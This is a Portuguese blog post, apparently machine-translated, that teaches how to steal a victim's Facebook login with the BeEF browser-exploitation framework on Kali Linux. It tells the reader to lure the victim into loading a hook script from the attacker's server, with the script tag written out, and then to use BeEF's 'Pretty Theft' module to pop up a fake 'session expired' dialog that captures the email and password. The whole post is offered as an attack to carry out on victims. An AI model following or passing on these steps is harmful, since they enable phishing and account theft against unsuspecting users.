Como obter credenciais do Facebook sem hackear o Facebook
Step 1: Instale o Kali (se você ainda não fez isso)
O primeiro passo é baixar e instalar o Kali Linux . Isso pode ser feito como um sistema operacional autônomo, uma inicialização dupla com seu sistema Windows ou Mac, ou em uma máquina virtual dentro do sistema operacional de sua escolha.Não, isso não pode ser feito com o Windows! O Windows, por todos os seus pontos fortes e facilidade de uso, não é um sistema operacional de hacking apropriado .
Dentro de Kali, existe um aplicativo chamado Framework de exploração do navegador (BeEF) . É capaz de ajudá-lo a cortar o navegador da vítima e assumir o controle disso. Depois de ter controle do seu navegador, há tantas coisas que você pode fazer. Um deles é enganar o usuário para dar suas credenciais no Facebook, o que eu vou mostrar aqui.
Step 2Passo 2: Open BeEF
Atire Kali, e você deve ser saudado com uma tela como abaixo. Você inicia o BeEF clicando no ícone da vaca à esquerda da área de trabalho Kali.
Quando você clica nele, ele começa a Beeb abrindo um terminal.
BeEF é uma aplicação que funciona em segundo plano em um servidor web no seu sistema que você acessa de um navegador. Uma vez que o BeEF está funcionando, abra o navegador IceWeasel para acessar sua interface. Você pode fazer login no BeEF usando o nome de usuário de carne bovina e a senha de carne bovina .
Você será saudado pela tela "Primeiros passos" da Beeb.
Step 3 Passo 3: engata o navegador da vítima
Esta é a parte mais crítica - talvez até a mais difícil - deste hack. Você deve fazer com que a vítima clique em um link de JavaScript especialmente projetado para "ligar" seu navegador. Isso pode ser feito de maneiras inúmeras.
A maneira mais simples é simplesmente incorporar o código em seu site e atrair o usuário a clicar nele. Isso pode ser feito por texto como " Clique aqui para obter mais informações " ou " Clique aqui para ver o vídeo ". Use sua imaginação.
O script parece algo abaixo. Insira-o em uma página da Web, e quando alguém clica nele, você possui seu navegador! (Comente abaixo se você tiver alguma dúvida sobre isso, você também pode usar o MitMf para enviar o código ao usuário, mas isso requer mais habilidade.)
<script src = "http://192.168.1.101:3000/hook.js” type =" text / javascript "> </ script>
A partir daqui, vou assumir que você "enganchou" o navegador da vítima e está pronto para possuí-lo.
Step 4Etapa 4: Enviar uma caixa de diálogo para o usuário
Quando você enganchou o navegador da vítima, seu endereço IP, juntamente com os ícones do sistema operacional e do tipo de navegador, aparecerá no painel "Navegadores enganados" à esquerda. Aqui, eu simplesmente usei meu próprio navegador para demonstrar.
Se clicarmos no navegador engatado, ele abre uma interface BEEF no lado direito.Observe que nos fornece os detalhes do navegador inicialmente. Ele também nos fornece uma série de guias. Para nossos propósitos aqui, estamos interessados na guia "Comandos".
Clique na guia "Comandos" e, em seguida, role para baixo a "Árvore de Módulos" até chegar a "Engenharia Social" e clique para expandi-la. Exibirá vários módulos de engenharia social. Clique em "Pretty Theft", que abrirá uma janela "Histórico de resultados do módulo" e "Pretty Theft".
Este módulo permite que você envie uma janela pop-up no navegador do usuário. No nosso caso, estaremos usando a caixa de diálogo do Facebook.
Se clicarmos na caixa "Tipo de diálogo", podemos ver que este módulo não só pode criar uma caixa de diálogo do Facebook, mas também um LinkedIn, Windows, YouTube, Yammer e uma caixa de diálogo genérica. Selecione o tipo de diálogo do Facebook e clique no botão "Executar" na parte inferior.
Step 5 Etapa 5: a caixa de diálogo aparece no sistema de destino
Quando você clica em "Executar" no BeEF, uma caixa de diálogo aparecerá no navegador da vítima, como abaixo. Ele diz à vítima que a sessão do Facebook expirou e eles precisam voltar a inserir suas credenciais.
Embora você possa suspeitar de uma caixa pop-up, a maioria dos usuários confiará em que sua sessão do Facebook expirou e simplesmente entrará em seu e-mail e senha.
Step 6 Passo 6: colher as credenciais
De volta ao nosso sistema na interface BeEf, podemos ver que as credenciais aparecem na janela "Resultados do comando". A vítima entrou seu endereço de e-mail "loveofmylife@gmail.com" e sua senha "sweetbippy" e eles foram capturados e apresentados em BeEF.
Se você está realmente determinado a obter essas credenciais do Facebook, pode ser definitivamente feito, e esta é apenas uma maneira de muitos métodos (mas provavelmente o mais simples).
Se você quiser desenvolver as habilidades para um nível ainda maior, comece a estudar aqui no Byte Null para dominar o conjunto de habilidades mais valioso do hacking do século 21!
Nenhum comentário:
Postar um comentário